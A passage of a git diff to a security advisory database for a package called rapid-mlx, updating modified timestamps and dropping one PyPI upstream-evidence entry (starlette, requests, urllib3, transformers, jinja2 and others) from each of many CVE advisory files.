"CVE-2023-29159", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-30798.json b/advisories/BREW-rapid-mlx-CVE-2023-30798.json index 6e162eccf22..16b2a34de76 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-30798.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-30798", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-32681.json b/advisories/BREW-rapid-mlx-CVE-2023-32681.json index 839d74efa1c..e792547f2e6 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-32681.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-32681", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-43804.json b/advisories/BREW-rapid-mlx-CVE-2023-43804.json index c2d91264fe8..99028c540f4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-43804.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-43804", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-45803.json b/advisories/BREW-rapid-mlx-CVE-2023-45803.json index dbd67e41fc7..17a54eb3340 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-45803.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-45803", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-6730.json b/advisories/BREW-rapid-mlx-CVE-2023-6730.json index 9da89296c05..d15d0b6f799 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-6730.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-6730.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-6730", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-3863-2447-669p", "CVE-2023-6730", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-7018.json b/advisories/BREW-rapid-mlx-CVE-2023-7018.json index e9c64c913de..2ec6296d345 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-7018.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-7018.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-7018", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-v68g-wm8c-6x7j", "CVE-2023-7018", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-11392.json b/advisories/BREW-rapid-mlx-CVE-2024-11392.json index 133fd5a2a31..53c16e18794 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-11392.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-11392.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-11392", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-qxrp-vhvm-j765", "CVE-2024-11392", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-11393.json b/advisories/BREW-rapid-mlx-CVE-2024-11393.json index 7e825920023..09f1f598ae6 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-11393.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-11393.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-11393", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-wrfc-pvp9-mr9g", "CVE-2024-11393", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-11394.json b/advisories/BREW-rapid-mlx-CVE-2024-11394.json index cf5fe13551d..db5eda30c53 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-11394.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-11394.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-11394", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-hxxf-235m-72v3", "CVE-2024-11394", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-12720.json b/advisories/BREW-rapid-mlx-CVE-2024-12720.json index 7d9c4285f1f..1574b823c82 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-12720.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-12720.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-12720", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-6rvg-6v2m-4j46", "CVE-2024-12720", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-22195.json b/advisories/BREW-rapid-mlx-CVE-2024-22195.json index 1c905e38d00..724cb40b9b0 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-22195.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-22195", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-34062.json b/advisories/BREW-rapid-mlx-CVE-2024-34062.json index d3babdb050e..3bab3951375 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-34062.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-34062", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-34064.json b/advisories/BREW-rapid-mlx-CVE-2024-34064.json index ee7fb50dd3e..02134b9cd3e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-34064.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-34064", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-35195.json b/advisories/BREW-rapid-mlx-CVE-2024-35195.json index a4ed1c146a9..a617a45864b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-35195.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-35195", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-3568.json b/advisories/BREW-rapid-mlx-CVE-2024-3568.json index b284f13e0d1..673c556517a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-3568.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-3568.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-3568", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-37q5-v5qm-c9v8", "CVE-2024-3568", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-3651.json b/advisories/BREW-rapid-mlx-CVE-2024-3651.json index 8f398a5d8e1..2a86694ea8e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-3651.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-3651", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-37891.json b/advisories/BREW-rapid-mlx-CVE-2024-37891.json index 6111b47260c..8fe4223b933 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-37891.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-37891", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-47081.json b/advisories/BREW-rapid-mlx-CVE-2024-47081.json index 72a1d981030..899c6ccf70f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-47081.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-47081", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-47874.json b/advisories/BREW-rapid-mlx-CVE-2024-47874.json index 980a42fd737..74f311d3ae1 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-47874.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-47874", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-53861.json b/advisories/BREW-rapid-mlx-CVE-2024-53861.json index d973476dc5d..96b1ab4afa2 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-53861.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-53861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-53861", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-75c5-xw7c-p5pm", "CVE-2024-53861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-53981.json b/advisories/BREW-rapid-mlx-CVE-2024-53981.json index 07e81f3f835..dd55fce5f07 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-53981.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-53981.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-53981", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-59g5-xgcq-4qw3", "CVE-2024-53981", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-56201.json b/advisories/BREW-rapid-mlx-CVE-2024-56201.json index dc4cd35e1aa..1200e933484 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-56201.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-56201", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-56326.json b/advisories/BREW-rapid-mlx-CVE-2024-56326.json index 5e723feb6df..343daaa9743 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-56326.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-56326", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-1194.json b/advisories/BREW-rapid-mlx-CVE-2025-1194.json index 94b6363fe57..7953a24034e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-1194.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-1194.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-1194", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fpwr-67px-3qhx", "CVE-2025-1194", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-2099.json b/advisories/BREW-rapid-mlx-CVE-2025-2099.json index 4d11a7f67e4..73eba9d7ed0 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-2099.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-2099.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-2099", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-qq3j-4f4f-9583", "CVE-2025-2099", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-27516.json b/advisories/BREW-rapid-mlx-CVE-2025-27516.json index b85e76fa27d..c886553e9fa 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-27516.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-27516", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3262.json b/advisories/BREW-rapid-mlx-CVE-2025-3262.json index 9aeeff71141..5ee9d7a2c51 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3262.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3262.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3262", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-489j-g2vx-39wf", "CVE-2025-3262", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3263.json b/advisories/BREW-rapid-mlx-CVE-2025-3263.json index eae004e01bd..0bf4339c333 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3263.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3263.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3263", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-q2wp-rjmx-x6x9", "CVE-2025-3263", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3264.json b/advisories/BREW-rapid-mlx-CVE-2025-3264.json index f5d8bc8dbd9..82c90cc7cea 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3264.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3264.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3264", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jjph-296x-mrcr", "CVE-2025-3264", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3777.json b/advisories/BREW-rapid-mlx-CVE-2025-3777.json index bf22410abe8..4da7b0998b4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3777.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3777.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3777", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-phhr-52qp-3mj4", "CVE-2025-3777", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3933.json b/advisories/BREW-rapid-mlx-CVE-2025-3933.json index c7ea8682039..56198f9fa46 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3933.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3933.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3933", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-37mw-44qp-f5jm", "CVE-2025-3933", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-43859.json b/advisories/BREW-rapid-mlx-CVE-2025-43859.json index 72c3d53758b..cb2c68b4408 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-43859.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-43859", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-4565.json b/advisories/BREW-rapid-mlx-CVE-2025-4565.json index 946f0d23f5f..45558c9ee21 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-4565.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-4565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-4565", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8qvm-5x2c-j2w7", "CVE-2025-4565", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": 